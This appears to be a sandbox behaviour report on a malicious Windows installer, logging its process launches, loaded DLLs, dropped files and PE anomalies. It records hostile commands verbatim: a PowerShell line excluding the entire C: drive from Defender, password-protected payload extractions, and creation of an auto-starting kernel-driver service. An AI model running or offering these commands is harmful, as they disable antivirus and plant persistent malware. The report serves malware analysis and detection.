Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpProcess created: C:\Users\user\Desktop\cVyexkZjrG.exe "C:\Users\user\Desktop\cVyexkZjrG.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\Desktop\cVyexkZjrG.exeProcess created: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp "C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp" /SL5="$40436,6416153,845824,C:\Users\user\Desktop\cVyexkZjrG.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9ialdJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\cVyexkZjrG.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\cVyexkZjrG.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: slc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\cVyexkZjrG.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\cVyexkZjrG.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: sfc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: explorerframe.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpWindow found: window name: TMainFormJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: cVyexkZjrG.exeStatic file information: File size 7370578 > 1048576
Source: cVyexkZjrG.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000D.00000003.2172723507.0000000003B80000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000D.00000003.2172865132.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.13.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BB57D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,10_2_00BB57D0
Source: cVyexkZjrG.tmp.0.drStatic PE information: real checksum: 0x0 should be: 0x343ad8
Source: cVyexkZjrG.tmp.6.drStatic PE information: real checksum: 0x0 should be: 0x343ad8
Source: update.vac.7.drStatic PE information: real checksum: 0x0 should be: 0x372ce7
Source: update.vac.2.drStatic PE information: real checksum: 0x0 should be: 0x372ce7
Source: cVyexkZjrG.exeStatic PE information: real checksum: 0x0 should be: 0x71186a
Source: hrsw.vbc.7.drStatic PE information: real checksum: 0x0 should be: 0x372ce7
Source: tProtect.dll.13.drStatic PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: cVyexkZjrG.exeStatic PE information: section name: .didata
Source: cVyexkZjrG.tmp.0.drStatic PE information: section name: .didata
Source: update.vac.2.drStatic PE information: section name: .00cfg
Source: update.vac.2.drStatic PE information: section name: .voltbl
Source: update.vac.2.drStatic PE information: section name: .8Tk
Source: cVyexkZjrG.tmp.6.drStatic PE information: section name: .didata
Source: 7zr.exe.7.drStatic PE information: section name: .sxdata
Source: update.vac.7.drStatic PE information: section name: .00cfg
Source: update.vac.7.drStatic PE information: section name: .voltbl
Source: update.vac.7.drStatic PE information: section name: .8Tk
Source: hrsw.vbc.7.drStatic PE information: section name: .00cfg
Source: hrsw.vbc.7.drStatic PE information: section name: .voltbl
Source: hrsw.vbc.7.drStatic PE information: section name: .8Tk
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CC586EB push ecx; ret 7_2_6CC586FE
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CB00F00 push ss; retn 0001h7_2_6CB00F0A
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CD26F10 push eax; ret 7_2_6CD26F2E
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CC8B9F4 push 004AC35Ch; ret 7_2_6CC8BA0E
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CD27290 push eax; ret 7_2_6CD272BE
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B345F4 push 00BDC35Ch; ret 10_2_00B3460E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BCFB10 push eax; ret 10_2_00BCFB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BCFE90 push eax; ret 10_2_00BCFEBE
Source: update.vac.2.drStatic PE information: section name: .8Tk entropy: 7.190790923053346
Source: update.vac.7.drStatic PE information: section name: .8Tk entropy: 7.190790923053346
Source: hrsw.vbc.7.drStatic PE information: section name: .8Tk entropy: 7.190790923053346
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpFile created: C:\Users\user\AppData\Local\Temp\is-H0N5U.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpFile created: C:\Users\user\AppData\Local\Temp\is-D54U1.tmp\update.vacJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeFile created: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\Desktop\cVyexkZjrG.exeFile created: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpFile created: C:\Program Files (x86)\Windows NT\7zr.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpFile created: C:\Users\user\AppData\Local\Temp\is-H0N5U.tmp\update.vacJump to dropped file
Source: C:\Users\user\Desktop\cVyexkZjrG.exeFile created: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpFile created: C:\Users\user\AppData\Local\Temp\is-D54U1.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpFile created: C:\Users\user\AppData\Local\Temp\is-H0N5U.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpFile created: C:\Users\user\AppData\Local\Temp\is-D54U1.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Desktop\cVyexkZjrG.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
